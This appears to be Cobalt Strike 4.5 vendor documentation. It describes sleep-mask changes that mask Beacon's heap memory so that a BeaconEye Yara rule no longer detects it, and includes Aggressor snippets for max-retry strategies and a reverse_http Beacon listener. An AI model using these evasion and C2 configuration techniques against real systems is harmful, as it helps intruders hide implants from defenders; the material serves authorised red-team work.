The size of the sleep mask executable code has been increased to 769 bytes from 289 bytes. 

Heap Memory 

A list of heap memory addresses has been added to the input to the sleep mask function. This allows for the ability to mask and unmask Beacon’s heap memory, which could be used to identify Beacon.

Compatibility

Any sleep mask modifications for Cobalt Strike 4.4 will not be compatible with 4.5 because of the changes to the functions input. This also means the sleep mask modifications are also not backwards compatible.  Users will need to have separate sleep mask versions for 4.4 and 4.5. An updated sleep mask kit is available through the Cobalt Strike UI Help -> Arsenal page. 

Changes 

  • Added a new HEAP_RECORDS data structure 
  • Added a pointer to the HEAP_RECORDS data structure to the existing SLEEPMASKP structure 
  • Added new loops to mask and unmask the heap memory identified by the HEAP_RECORDS structure. 

Limitations

These are the current limitations to the sleep mask kit for Cobalt Strike 4.5:

  • The executable code size cannot exceed 769 bytes. If this occurs the default sleep mask function will be used. 
  • Only one function can be defined in the source code file. 
  • Use of external functions are not supported 

Example

For this example, the Sleep Mask Kit for Cobalt Strike version 4.5 with a modification to the code to only mask and unmask when the sleep is larger than two seconds will be used. This allows for the ability to control the masking and unmasking of Beacon based on the current sleep time.  

Generate a Beacon using the modified sleep mask and deploy it on your target system. The Beacon is now running and has a PID value of 5400 for this example. 

Using a Yara rule based on the BeaconEye project, beacon will be detected. The rule shows the memory address that triggered the detection as the current sleep time is set 1 second.

Detected at 0x7c7290

Using Process Hacker, open the process (5400) and look at the contents of memory at the found location of 0x7c7290. This is determined by finding the base address 0x7b0000 and subtracting from 0x7c7290 to determine the offset within this block of heap memory.

Beacon’s configuration unmasked

The highlighted portion shows the signature that was used to identify Beacon, which represents Beacon’s configuration in the heap memory. 

With the Cobalt Strike version 4.5 sleep mask this location in memory is provided as one of heap memory addresses in the HEAP_RECORDS list. Now, update the sleep time for this beacon to three seconds so it will mask itself while sleeping and then inspect this memory location again. 

Beacon’s Configuration masked

Comparing this to the previous screenshot shows the heap memory is now masked. Running the Yara rule again shows that it does not detect the signature for Beacon’s configuration.

This is just one simple example of using the sleep mask to obfuscate Beacon in memory.

Enjoy!

References

A Deeper Look Into the Max Retry Strategy Option

A complementary strategy to the Host Rotation Strategy was introduced to Cobalt Strike 4.5. The max retry strategy was added to HTTP, HTTPS, and DNS beacon listeners. A max retry strategy allows a beacon to exit after a specified failure count. As the failure count increases, sleep is adjusted to a specified value. By default, sleep is adjusted at 50% of the failure count.

A max retry can be selected from a list via the create listener GUI:

max retry option set as a listener option

The list can be updated with custom values using the aggressor hook LISTENER_MAX_RETRY_STRATEGIES.

https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_hooks.htm#LISTENER_MAX_RETRY_STRATEGIES

The values in aggressor allow combination of options to be set vs. selecting from the default list.

# Use a hard coded list of strategies
set LISTENER_MAX_RETRY_STRATEGIES {
    local('$out');
    $out .= "exit-18-12-5m\n";
    $out .= "exit-22-14-5m\n";
    return $out;
}
 
# Use loops to build a list of strategies
set LISTENER_MAX_RETRY_STRATEGIES {
    local('$out');
 
    @attempts = @(50, 100);
    @durations = @("5m", "15m");
    $increase = 25;
 
    foreach $attempt (@attempts)
    {
        foreach $duration (@durations)
        {
            $out .= "exit $+ - $+ $attempt $+ - $+ $increase $+ - $+ $duration\n";
        }
    }
 
    return $out;
}

Understanding the Max Retry Syntax

Max Retry Strategy Syntax

The syntax is broken into four sections separated by a dash:

ColumnDescription
1exit
2Exit beacon after this number of failures
3Number of failures to begin adjust sleep
4Sleep time to set when sleep failures are met. Note: The jitter is kept to the current setting.

Using Aggressor to Create a Listener

If you use aggressor to create listeners, you can set the max retry using the max_retry option. This can be set to your custom max retry strategy without the need to be pre-defined.

Below is an example of the listener_create_ext function used to create a listener.

https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#listener_create_ext

# create an HTTP Beacon listener
listener_create_ext("HTTP", "windows/beacon_http/reverse_http",
      %(host => "stage.host",
      profile => "default",
      port => 80,
      beacons => "b1.host,b2.host",
      althost => "alt.host",
      bindto => 8080,
      strategy => "failover-5x",
      max_retry => "exit-10-5-5m",
      proxy => "proxy.host"));

TIP: Running Cobalt Strike Teamserver as a Service

These scripts can be used as a template to set up teamserver as a service and to auto-start listeners.

https://github.com/vestjoe/cobaltstrike_services